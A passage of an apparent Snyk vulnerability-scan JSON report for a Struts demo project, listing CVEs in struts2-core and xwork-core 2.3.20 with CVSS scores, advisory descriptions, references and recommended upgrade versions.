"baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", + "epssDetails": { + "percentile": "0.86905", + "probability": "0.01484", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-34149" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-06-14T10:02:40.213361Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-06-14T09:51:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-06-14T10:55:13.206157Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:27.696682Z", + "socialTrendAlert": false, + "severityWithCritical": 
"medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "credit": [ + "Takeshi Terada of Mitsui Bussan Secure Directions", + "Inc" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-060", + "title": "Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.403682Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:16.027732Z" + }, + { + "type": "secondary", + 
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:03.532706Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). When a file upload is performed to an `Action` that exposes the file with a getter, an attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container's temp directory to read-only, such that subsequent upload actions will fail.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.22 or higher.\n## References\n- [Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-060)\n", + "epssDetails": { + "percentile": "0.95581", + "probability": "0.13147", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-0233" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-08-21T14:39:32.053413Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-08-11T14:36:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-08-21T14:36:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:03.532706Z", + "socialTrendAlert": 
false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.22" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "title": "Unrestricted Upload of File with Dangerous Type", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://issues.apache.org/jira/browse/WW-5055", + "title": "Bug Report" + }, + { + "url": "https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:42.248460Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:53.807283Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web 
applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Unrestricted Upload of File with Dangerous Type. A local code execution issue exists in Apache Struts2 when processing malformed XSLT files, which could let a malicious user upload and execute arbitrary files.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5 or higher.\n## References\n- [Bug Report](https://issues.apache.org/jira/browse/WW-5055)\n- [GitHub Commit](https://github.com/apache/struts/commit/4271682d2b944e9022e4e4c499df43e0ce7e58fd)\n", + "epssDetails": { + "percentile": "0.60025", + "probability": "0.00216", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2012-1592" + ], + "CWE": [ + "CWE-434" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2020-09-04T15:56:51.451242Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-12-05T15:43:54Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2020-09-04T15:56:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:45:53.807283Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "title": "Denial of Service", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew 
McClain" + ], + "semver": { + "vulnerable": [ + "[,2.5.32)", + "[6.0.0,6.1.2.2)", + "[6.2.0,6.3.0.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.32", + "6.1.2.2", + "6.3.0.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-065", + "title": "Struts Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:27.113057Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:08.762991Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 
7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:10.404666Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service when certain fields exceed the `maxStringLength` limit during multipart requests. An attacker can exploit this to leave uploaded files in the `struts.multipart.saveDir` even after the request has been denied resulting in excessive disk usage.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.32, 6.1.2.2, 6.3.0.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/3292152f8c0a77ee4827beede82b6580478a2c2a)\n- [GitHub Commit](https://github.com/apache/struts/commit/4c044f12560e22e00520595412830f9582d6dac7)\n- [GitHub Commit](https://github.com/apache/struts/commit/bf54436869c264941dd192c752a4abfaa65d3711)\n- [Struts Issue](https://cwiki.apache.org/confluence/display/WW/S2-065)\n", + "epssDetails": { + "percentile": "0.66400", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-41835" + ], + "CWE": [ + "CWE-400" + ], + "GHSA": [ + "GHSA-729q-fcgp-r5xh" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-12-06T07:04:16.630936Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-12-05T09:33:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-12-06T08:01:07.098280Z", + "severityBasedOn": "CVSS", + 
"modificationTime": "2024-03-11T09:54:10.404666Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.32" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "title": "Parameter Alteration", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "rskvp93" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.24.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-026.html", + "title": "Apache Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:10.273105Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:49:01.496065Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nAffected versions of the package are vulnerable to Parameter Alteration. 
ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings\n\n\n## References\n- [Apache Security Advisory](https://struts.apache.org/docs/s2-026.html)\n", + "epssDetails": { + "percentile": "0.70008", + "probability": "0.00305", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-5209" + ], + "CWE": [ + "CWE-235" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.673000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-09-28T16:59:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2015-09-28T16:59:30Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:01.496065Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.24.1", + "org.apache.struts.xwork:xwork-core@2.3.24.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.28)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.28" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + 
"language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.122257Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:29.964282Z" + } + ], + "description": "## Overview\n[org.apache.struts.xwork:xwork-core](https://mvnrepository.com/artifact/org.apache.struts.xwork/xwork-core) is a generic command pattern framework. 
It forms the core of Struts 2.\n\nAffected versions of this package are vulnerable to Improper Input Validation via a `%{}` sequence in a tag attribute, aka forced double OGNL evaluation.\n## Remediation\nUpgrade `org.apache.struts.xwork:xwork-core` to version 2.3.28 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/15857a69e7baf3675804495a5954cd0756ac8364)\n", + "epssDetails": { + "percentile": "0.88004", + "probability": "0.01731", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-0785" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.686000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T05:58:06Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T05:58:06Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:29.964282Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "title": "Cross-site Scripting (XSS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.25)" + ] + }, 
+ "exploit": "Not Defined", + "fixedIn": [ + "2.3.25" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/fc2179cf1ac9fbfb61e3430fa88b641d87253327", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:24.610273Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:47.186038Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.x before 2.3.25 does not sanitize text in the Locale object constructed by I18NInterceptor, which might allow remote attackers to conduct cross-site scripting (XSS) attacks via unspecified vectors involving language display.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without 
validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2162)", + "epssDetails": { + "percentile": "0.96202", + "probability": "0.18207", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-2162" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts.xwork:xwork-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.701000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T07:51:26.242000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts.xwork", + "artifactId": "xwork-core" + }, + "publicationTime": "2016-03-16T07:51:26.242000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:47.186038Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28", + "org.apache.struts.xwork:xwork-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts.xwork:xwork-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + 
"title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2,2.3.24.1]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts.xwork:xwork-core", + "references": [ + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.405967Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.033229Z" + } + ], + "description": "## Overview\n[`org.apache.struts.xwork:xwork-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22xwork-core%22)\nApache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors.\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093)", + "epssDetails": { + "percentile": "0.90602", + "probability": "0.02732", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-3093" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": 
